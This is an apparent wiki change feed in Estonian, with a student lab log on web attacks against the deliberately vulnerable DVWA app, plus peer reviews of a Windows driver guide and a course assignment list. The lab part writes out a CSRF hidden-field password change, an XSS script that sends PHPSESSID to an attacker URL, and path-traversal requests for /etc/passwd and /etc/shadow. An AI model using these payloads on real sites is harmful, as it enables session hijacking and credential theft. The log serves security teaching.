Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;Xsstesting.jpg&amp;quot;/&amp;gt;&lt;br /&gt;
Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
Easy puhul:&lt;br /&gt;
Saab sisestada textboxi skripti:&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&lt;br /&gt;
Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
Näide logist:&lt;br /&gt;
/var/log/apache2/access.log&lt;br /&gt;
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
        &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas&lt;br /&gt;
    http://dvwa/hackable/uploads/*.php&lt;br /&gt;
käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
    esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
    teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
        &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
    Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
    Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
    ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
    http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
    data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
    http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== 4. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno&amp;lt;br&amp;gt;&lt;br /&gt;
Urmo Lihten&amp;lt;br&amp;gt;&lt;br /&gt;
Taavi Podžuks&amp;lt;br&amp;gt;&lt;br /&gt;
Matis Alliksoo&amp;lt;br&amp;gt;&lt;br /&gt;
Sander Saarm&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=File:Xsstesting.jpg&amp;diff=46832</id>
		<title>File:Xsstesting.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=File:Xsstesting.jpg&amp;diff=46832"/>
		<updated>2012-03-28T11:33:02Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38688</id>
		<title>Talk:Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38688"/>
		<updated>2011-10-17T15:58:51Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Velmar Piibeleht ==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039; On ära märgitud kõik hetkel rohkem kasutuses olevad Windowsi-d kuid oleks võinud rohkem välja tuua Windows XP driverite varundamisest kuna enamasti kasutatakse Win Xp-d vanematel raalidel kus ka vanem riistvara, mille drivereid netist aga nii kergelt leida ei pruugi ja vajadus driverite varundamisele on suurem. Windows Vista ja 7 on juba suhteliselt võimekad ise vajalikke drivereid leidma kuna windows update töötab üpriski adekvaadselt, enamasti vanema riistvaraga probleeme. Filerepository on küll hea võimalus kõiki drivereid korraga varundada kuid samas tänapäeval on pea kõikjal internet ning sellest tulenevalt ka uued driverid kättesaadavad ning alati on mõteks ju kasutada uusimaid töötavaid drivereid. Selle kasulikkus tuleb välja varem mainitud vanema või ka erilise riistvara kasutamisel. &amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039; Esimene pilt kus toodud viide Device Managerile. Milleks minna ringiga kui saab otse? Windowsi märk ja kirjutada sisse Device Manager, sedagi ei pea lõpuni kirjutama. Aga see oli lihtsalt valge inimese tähelepanek kuidas asju lihtsamini teha. Üldiselt on jällegi selgeks tehtud ka võhikule, mis ongi ühe juhendi mõte.&lt;br /&gt;
&lt;br /&gt;
Kokkuvõtvalt on kasulik kõigile kes ei leia oma riistvarale õigeid drivereid kuna on toodud ka välja võimalus kuidas otsida oma puuduva riistvara drivereid mida Windows Update ei leia ja mille tarkvara enam alles ei ole.&lt;br /&gt;
&lt;br /&gt;
==Matis Alliksoo==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
Sisu on hästi jälgitav ja korralik. Sisu on üles ehitatud selliselt, et ka arvutit vähem tundvad inimesed antud juhisega hakkama saaksid. Hästi on lisaks ka välja otsitud programme ja võimalusi asjade teistmoodi/erinevalt tegemiseks. PnPutiliti välja toomine on artiklile suureks plussiks.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
Kujundus näeb hea välja. Pildid on normaalse suurusega ja erinevad path&#039;id ja command&#039;id on eraldi kastides hästi välja toodud.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
Juhend on kvaliteetne Windows Vista või 7&#039;me draiverite uuendamiseks ja sellega peaks hakkama saama iga kasutaja. Probleeme võib aga tekkida vanemate Windowsi versioonidega, sest pildid on kõik Windows 7/Vistaga.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
Viited on olemas ja enamus nendest on ka usaldusväärsed Microsofti leheküljed.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;br /&gt;
Kasulik ja hea näide Driveri otsimisest Riistvaralise ID&#039;ga&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38687</id>
		<title>Talk:Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38687"/>
		<updated>2011-10-17T15:55:57Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Velmar Piibeleht ==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039; On ära märgitud kõik hetkel rohkem kasutuses olevad Windowsi-d kuid oleks võinud rohkem välja tuua Windows XP driverite varundamisest kuna enamasti kasutatakse Win Xp-d vanematel raalidel kus ka vanem riistvara, mille drivereid netist aga nii kergelt leida ei pruugi ja vajadus driverite varundamisele on suurem. Windows Vista ja 7 on juba suhteliselt võimekad ise vajalikke drivereid leidma kuna windows update töötab üpriski adekvaadselt, enamasti vanema riistvaraga probleeme. Filerepository on küll hea võimalus kõiki drivereid korraga varundada kuid samas tänapäeval on pea kõikjal internet ning sellest tulenevalt ka uued driverid kättesaadavad ning alati on mõteks ju kasutada uusimaid töötavaid drivereid. Selle kasulikkus tuleb välja varem mainitud vanema või ka erilise riistvara kasutamisel. &amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039; Esimene pilt kus toodud viide Device Managerile. Milleks minna ringiga kui saab otse? Windowsi märk ja kirjutada sisse Device Manager, sedagi ei pea lõpuni kirjutama. Aga see oli lihtsalt valge inimese tähelepanek kuidas asju lihtsamini teha. Üldiselt on jällegi selgeks tehtud ka võhikule, mis ongi ühe juhendi mõte.&lt;br /&gt;
&lt;br /&gt;
Kokkuvõtvalt on kasulik kõigile kes ei leia oma riistvarale õigeid drivereid kuna on toodud ka välja võimalus kuidas otsida oma puuduva riistvara drivereid mida Windows Update ei leia ja mille tarkvara enam alles ei ole.&lt;br /&gt;
&lt;br /&gt;
==Matis Alliksoo==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
Sisu on hästi jälgitav ja korralik. Sisu on üles ehitatud selliselt, et ka arvutit vähem tundvad inimesed antud juhisega hakkama saaksid. Hästi on lisaks ka välja otsitud programme ja võimalusi asjade teistmoodi/erinevalt tegemiseks.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
Kujundus näeb hea välja. Pildid on normaalse suurusega ja erinevad path&#039;id ja command&#039;id on eraldi kastides hästi välja toodud.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
Juhend on kvaliteetne Windows Vista või 7&#039;me draiverite uuendamiseks ja sellega peaks hakkama saama iga kasutaja. Probleeme võib aga tekkida vanemate Windowsi versioonidega, sest pildid on kõik Windows 7/Vistaga.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
Viited on olemas ja enamus nendest on ka usaldusväärsed Microsofti leheküljed.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;br /&gt;
Kasulik ja hea näide Driveri otsimisest Riistvaralise ID&#039;ga&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38686</id>
		<title>Talk:Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38686"/>
		<updated>2011-10-17T15:53:15Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Velmar Piibeleht ==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039; On ära märgitud kõik hetkel rohkem kasutuses olevad Windowsi-d kuid oleks võinud rohkem välja tuua Windows XP driverite varundamisest kuna enamasti kasutatakse Win Xp-d vanematel raalidel kus ka vanem riistvara, mille drivereid netist aga nii kergelt leida ei pruugi ja vajadus driverite varundamisele on suurem. Windows Vista ja 7 on juba suhteliselt võimekad ise vajalikke drivereid leidma kuna windows update töötab üpriski adekvaadselt, enamasti vanema riistvaraga probleeme. Filerepository on küll hea võimalus kõiki drivereid korraga varundada kuid samas tänapäeval on pea kõikjal internet ning sellest tulenevalt ka uued driverid kättesaadavad ning alati on mõteks ju kasutada uusimaid töötavaid drivereid. Selle kasulikkus tuleb välja varem mainitud vanema või ka erilise riistvara kasutamisel. &amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039; Esimene pilt kus toodud viide Device Managerile. Milleks minna ringiga kui saab otse? Windowsi märk ja kirjutada sisse Device Manager, sedagi ei pea lõpuni kirjutama. Aga see oli lihtsalt valge inimese tähelepanek kuidas asju lihtsamini teha. Üldiselt on jällegi selgeks tehtud ka võhikule, mis ongi ühe juhendi mõte.&lt;br /&gt;
&lt;br /&gt;
Kokkuvõtvalt on kasulik kõigile kes ei leia oma riistvarale õigeid drivereid kuna on toodud ka välja võimalus kuidas otsida oma puuduva riistvara drivereid mida Windows Update ei leia ja mille tarkvara enam alles ei ole.&lt;br /&gt;
&lt;br /&gt;
==Matis Alliksoo==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
Sisu on hästi jälgitav ja korralik. Sisu on üles ehitatud selliselt, et ka arvutit vähem tundvad inimesed antud juhisega hakkama saaksid. Hästi on lisaks ka välja otsitud programme ja võimalusi asjade teistmoodi/erinevalt tegemiseks.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
Kujundus näeb hea välja. Pildid on normaalse suurusega ja erinevad path&#039;id ja command&#039;id on eraldi kastides hästi välja toodud.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
Juhend on kvaliteetne Windows Vista või 7&#039;me draiverite uuendamiseks ja sellega peaks hakkama saama iga kasutaja. Probleeme võib aga tekkida vanemate Windowsi versioonidega.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
Viited on olemas ja enamus nendest on ka usaldusväärsed Microsofti leheküljed.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;br /&gt;
Kasulik ja hea näide Driveri otsimisest Riistvaralise ID&#039;ga&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38685</id>
		<title>Talk:Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38685"/>
		<updated>2011-10-17T15:48:24Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Velmar Piibeleht ==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039; On ära märgitud kõik hetkel rohkem kasutuses olevad Windowsi-d kuid oleks võinud rohkem välja tuua Windows XP driverite varundamisest kuna enamasti kasutatakse Win Xp-d vanematel raalidel kus ka vanem riistvara, mille drivereid netist aga nii kergelt leida ei pruugi ja vajadus driverite varundamisele on suurem. Windows Vista ja 7 on juba suhteliselt võimekad ise vajalikke drivereid leidma kuna windows update töötab üpriski adekvaadselt, enamasti vanema riistvaraga probleeme. Filerepository on küll hea võimalus kõiki drivereid korraga varundada kuid samas tänapäeval on pea kõikjal internet ning sellest tulenevalt ka uued driverid kättesaadavad ning alati on mõteks ju kasutada uusimaid töötavaid drivereid. Selle kasulikkus tuleb välja varem mainitud vanema või ka erilise riistvara kasutamisel. &amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039; Esimene pilt kus toodud viide Device Managerile. Milleks minna ringiga kui saab otse? Windowsi märk ja kirjutada sisse Device Manager, sedagi ei pea lõpuni kirjutama. Aga see oli lihtsalt valge inimese tähelepanek kuidas asju lihtsamini teha. Üldiselt on jällegi selgeks tehtud ka võhikule, mis ongi ühe juhendi mõte.&lt;br /&gt;
&lt;br /&gt;
Kokkuvõtvalt on kasulik kõigile kes ei leia oma riistvarale õigeid drivereid kuna on toodud ka välja võimalus kuidas otsida oma puuduva riistvara drivereid mida Windows Update ei leia ja mille tarkvara enam alles ei ole.&lt;br /&gt;
&lt;br /&gt;
==Matis Alliksoo==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
Sisu on hästi jälgitav ja korralik. Sisu on üles ehitatud selliselt, et ka arvutit vähem tundvad inimesed antud juhisega hakkama saaksid. Hästi on lisaks ka välja otsitud programme ja võimalusi asjade teistmoodi/erinevalt tegemiseks.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
Kujundus näeb hea välja. Pildid on normaalse suurusega ja erinevad path&#039;id ja command&#039;id on eraldi kastides hästi välja toodud.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;br /&gt;
Kasulik ja hea näide Driveri otsimisest Riistvaralise ID&#039;ga&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows-t%C3%B6%C3%B6jaamade_haldamise_aines_valminud_referaadid_2011_s%C3%BCgis,_p%C3%A4eva%C3%B5pe&amp;diff=38681</id>
		<title>Windows-tööjaamade haldamise aines valminud referaadid 2011 sügis, päevaõpe</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows-t%C3%B6%C3%B6jaamade_haldamise_aines_valminud_referaadid_2011_s%C3%BCgis,_p%C3%A4eva%C3%B5pe&amp;diff=38681"/>
		<updated>2011-10-17T15:40:38Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Matis Alliksoo */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Jaan Igamees=&lt;br /&gt;
* Referaat: [[MiskiAsjalikTeema]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:VHD_Boot&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
=Silver Kullarand=&lt;br /&gt;
* Referaat: [[SmartScreen Filter]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Dynamic_disk&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_8_-_mida_uut&lt;br /&gt;
&lt;br /&gt;
=Tambet Liiv=&lt;br /&gt;
* Referaat: [[Boot Configuration Data]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
= Kristjan Rõõm =&lt;br /&gt;
* Referaat: [[Security zones]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:VHD_Boot&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:SmartScreen_Filter&lt;br /&gt;
&lt;br /&gt;
= Viljar Rooda =&lt;br /&gt;
* Referaat: [[Dynamic disk]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Security_zones&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:SmartScreen_Filter&lt;br /&gt;
&lt;br /&gt;
= Virgo Krüger =&lt;br /&gt;
*Referaat: [[Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise]]&lt;br /&gt;
*Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Resource_Monitor&lt;br /&gt;
*Arvutus2: https://wiki.itcollege.ee/index.php/Talk:PnPUtil&lt;br /&gt;
&lt;br /&gt;
=Tarmo Suurmägi=&lt;br /&gt;
* Referaat: [[System Configuration Tool]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_7_Upgrade_Advisor&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:System_restore_point&lt;br /&gt;
&lt;br /&gt;
